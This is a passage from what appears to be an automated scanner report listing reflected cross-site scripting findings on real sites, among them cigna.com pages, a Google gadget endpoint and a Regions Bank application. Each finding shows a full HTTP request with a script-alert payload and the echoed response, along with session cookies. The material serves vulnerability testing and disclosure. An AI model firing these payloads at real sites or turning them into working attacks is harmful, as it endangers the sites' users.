This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/toolkit/managers_disability/returnb7469<script>alert(1)</script>2bbe4b818d7/index.htm HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
Referer: http://cigna.com/sites/toolkit/managers_disability/home.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTSID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:31:42 GMT
Content-type: text/html; charset=utf-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/sites/toolkit/managers_disability/returnb7469<script>alert(1)</script>2bbe4b818d7/index.htm</b>
...[SNIP]...

2.12. http://cigna.com/sites/toolkit/managers_disability/return/index.htm [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/managers_disability/return/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f8933<script>alert(1)</script>9a9127f6631 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/toolkit/managers_disability/return/index.htmf8933<script>alert(1)</script>9a9127f6631 HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
Referer: http://cigna.com/sites/toolkit/managers_disability/home.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTSID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:31:52 GMT
Content-type: text/html; charset=utf-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/sites/toolkit/managers_disability/return/index.htmf8933<script>alert(1)</script>9a9127f6631</b>
...[SNIP]...

2.13. http://cigna.com/sites/toolkit/physicians_disability/home/forms/index.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/physicians_disability/home/forms/index.htm

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c0f96<script>alert(1)</script>b776986e18 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitesc0f96<script>alert(1)</script>b776986e18/toolkit/physicians_disability/home/forms/index.htm HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
Referer: http://cigna.com/sites/toolkit/physicians_disability/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; TLTHID=9AB6B3A47FD1107FCBDEA536181C0CE6

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:35:09 GMT
Content-type: text/html; charset=utf-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/sitesc0f96<script>alert(1)</script>b776986e18/toolkit/physicians_disability/home/forms/index.htm</b>
...[SNIP]...

2.14. http://cigna.com/sites/toolkit/physicians_disability/home/forms/index.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/physicians_disability/home/forms/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 77fcd<script>alert(1)</script>c378a8279f4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/toolkit77fcd<script>alert(1)</script>c378a8279f4/physicians_disability/home/forms/index.htm HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
Referer: http://cigna.com/sites/toolkit/physicians_disability/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; TLTHID=9AB6B3A47FD1107FCBDEA536181C0CE6

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:35:21 GMT
Content-type: text/html; charset=utf-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/sites/toolkit77fcd<script>alert(1)</script>c378a8279f4/physicians_disability/home/forms/index.htm</b>
...[SNIP]...

2.15. http://cigna.com/sites/toolkit/physicians_disability/home/forms/index.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/physicians_disability/home/forms/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 94c8d<script>alert(1)</script>4fb2e4286a4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/toolkit/physicians_disability94c8d<script>alert(1)</script>4fb2e4286a4/home/forms/index.htm HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
Referer: http://cigna.com/sites/toolkit/physicians_disability/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; TLTHID=9AB6B3A47FD1107FCBDEA536181C0CE6

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:35:33 GMT
Content-type: text/html; charset=utf-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/sites/toolkit/physicians_disability94c8d<script>alert(1)</script>4fb2e4286a4/home/forms/index.htm</b>
...[SNIP]...

2.16. http://cigna.com/sites/toolkit/physicians_disability/home/forms/index.htm [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/physicians_disability/home/forms/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 86a58<script>alert(1)</script>91e4d5dc5f0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/toolkit/physicians_disability/home86a58<script>alert(1)</script>91e4d5dc5f0/forms/index.htm HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
Referer: http://cigna.com/sites/toolkit/physicians_disability/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; TLTHID=9AB6B3A47FD1107FCBDEA536181C0CE6

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:35:48 GMT
Content-type: text/html; charset=utf-8
Content-Length: 15812

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/sites/toolkit/physicians_disability/home86a58<script>alert(1)</script>91e4d5dc5f0/forms/index.htm</b>
...[SNIP]...

2.17. http://cigna.com/sites/toolkit/physicians_disability/home/forms/index.htm [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/physicians_disability/home/forms/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 41540<script>alert(1)</script>69601a947b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/toolkit/physicians_disability/home/forms41540<script>alert(1)</script>69601a947b/index.htm HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
Referer: http://cigna.com/sites/toolkit/physicians_disability/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; TLTHID=9AB6B3A47FD1107FCBDEA536181C0CE6

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:36:04 GMT
Content-type: text/html; charset=utf-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/sites/toolkit/physicians_disability/home/forms41540<script>alert(1)</script>69601a947b/index.htm</b>
...[SNIP]...

2.18. http://cigna.com/sites/toolkit/physicians_disability/home/forms/index.htm [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/physicians_disability/home/forms/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d458a<script>alert(1)</script>041ca9433a4 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/toolkit/physicians_disability/home/forms/index.htmd458a<script>alert(1)</script>041ca9433a4 HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
Referer: http://cigna.com/sites/toolkit/physicians_disability/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; TLTHID=9AB6B3A47FD1107FCBDEA536181C0CE6

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:36:21 GMT
Content-type: text/html; charset=utf-8
Content-Length: 15812

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/sites/toolkit/physicians_disability/home/forms/index.htmd458a<script>alert(1)</script>041ca9433a4</b>
...[SNIP]...

2.19. http://cigna.com/sites/toolkit/physicians_disability/index.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/physicians_disability/index.htm

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c04c7<script>alert(1)</script>576bc49dcf7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitesc04c7<script>alert(1)</script>576bc49dcf7/toolkit/physicians_disability/index.htm HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:31:24 GMT
Content-type: text/html; charset=utf-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/sitesc04c7<script>alert(1)</script>576bc49dcf7/toolkit/physicians_disability/index.htm</b>
...[SNIP]...

2.20. http://cigna.com/sites/toolkit/physicians_disability/index.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/physicians_disability/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b9565<script>alert(1)</script>c8671da1275 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/toolkitb9565<script>alert(1)</script>c8671da1275/physicians_disability/index.htm HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:31:30 GMT
Content-type: text/html; charset=utf-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/sites/toolkitb9565<script>alert(1)</script>c8671da1275/physicians_disability/index.htm</b>
...[SNIP]...

2.21. http://cigna.com/sites/toolkit/physicians_disability/index.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/physicians_disability/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d0a8b<script>alert(1)</script>b826c91f132 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/toolkit/physicians_disabilityd0a8b<script>alert(1)</script>b826c91f132/index.htm HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:31:36 GMT
Content-type: text/html; charset=utf-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/sites/toolkit/physicians_disabilityd0a8b<script>alert(1)</script>b826c91f132/index.htm</b>
...[SNIP]...

2.22. http://cigna.com/sites/toolkit/physicians_disability/index.htm [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/physicians_disability/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 644d7<script>alert(1)</script>a7103796015 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/toolkit/physicians_disability/index.htm644d7<script>alert(1)</script>a7103796015 HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:31:42 GMT
Content-type: text/html; charset=utf-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/sites/toolkit/physicians_disability/index.htm644d7<script>alert(1)</script>a7103796015</b>
...[SNIP]...

2.23. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/ifr

Issue detail

The value of the url request parameter is copied into a JavaScript rest-of-line comment. The payload 7ddc7%0aalert(1)//83f1733c0b7 was submitted in the url parameter. This input was echoed as 7ddc7
alert(1)//83f1733c0b7
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gadgets/ifr?url=http://fcgadgets.appspot.com/spec/shareit.xml7ddc7%0aalert(1)//83f1733c0b7&container=peoplesense&parent=http://www.cloudscan.me/&mid=0&view=profile&libs=google.blog&d=0.558.7&lang=en&view-params=%7B%22skin%22:%7B%22FACE_SIZE%22:%2232%22,%22HEIGHT%22:%22200%22,%22TITLE%22:%22%22,%22BORDER_COLOR%22:%22transparent%22,%22ENDCAP_BG_COLOR%22:%22transparent%22,%22ENDCAP_TEXT_COLOR%22:%22%23666666%22,%22ENDCAP_LINK_COLOR%22:%22%233d74a5%22,%22ALTERNATE_BG_COLOR%22:%22transparent%22,%22CONTENT_BG_COLOR%22:%22transparent%22,%22CONTENT_LINK_COLOR%22:%22%233d74a5%22,%22CONTENT_TEXT_COLOR%22:%22%23666666%22,%22CONTENT_SECONDARY_LINK_COLOR%22:%22%233d74a5%22,%22CONTENT_SECONDARY_TEXT_COLOR%22:%22%23666666%22,%22CONTENT_HEADLINE_COLOR%22:%22%23666666%22,%22FONT_FACE%22:%22normal+normal+13px+Arial,+Tahoma,+Helvetica,+FreeSans,+sans-serif%22%7D%7D&communityId=00129212639365482611&caller=http://www.cloudscan.me/p/enterprise-exploit-coverage-by-hoyt-llc.html HTTP/1.1
Host: ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Date: Mon, 16 May 2011 14:32:50 GMT
Expires: Mon, 16 May 2011 14:32:50 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 116

Unable to retrieve spec for http://fcgadgets.appspot.com/spec/shareit.xml7ddc7
alert(1)//83f1733c0b7
. HTTP error 400

2.24. https://secureapps.regions.com/OAO/DESGetFiles.aspx [files parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /OAO/DESGetFiles.aspx

Issue detail

The value of the files request parameter is copied into the HTML document as plain text between tags. The payload 47833<script>alert(1)</script>52cb1a64e34 was submitted in the files parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /OAO/DESGetFiles.aspx?type=scripts&version=4.0.5.5000&files=0_1_14_24_41_43_48_49_51_5447833<script>alert(1)</script>52cb1a64e34 HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=savings
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555554875:ss=1305555542668; ASP.NET_SessionId=maulyk45yit1a2rvnyvjro3i; secureapps.regions.com-ssl=R54983192

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54983192; path=/
Cache-Control: public
Content-Type: text/javascript; charset=utf-8
Expires: Thu, 16 Jun 2011 05:00:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Mon, 16 May 2011 15:21:34 GMT
Content-Length: 259

// The files= parameter was tampered with. No files were returned./* Exception:Cannot convert [5447833<script>alert(1)</script>52cb1a64e34] to an integer. Type:System.FormatException files=0_1_14_24_41_43_48_49_51_5447833<script>
...[SNIP]...

2.25. https://sso.corp.cigna.com/corp/sso/professional/controller [DESTINATION parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/professional/controller

Issue detail

The value of the DESTINATION request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b12dc"><script>alert(1)</script>64cebfa3f0d was submitted in the DESTINATION parameter. This input was echoed as b12dc"><script>alert(1)</script>64cebfa3f0d in the application's response.

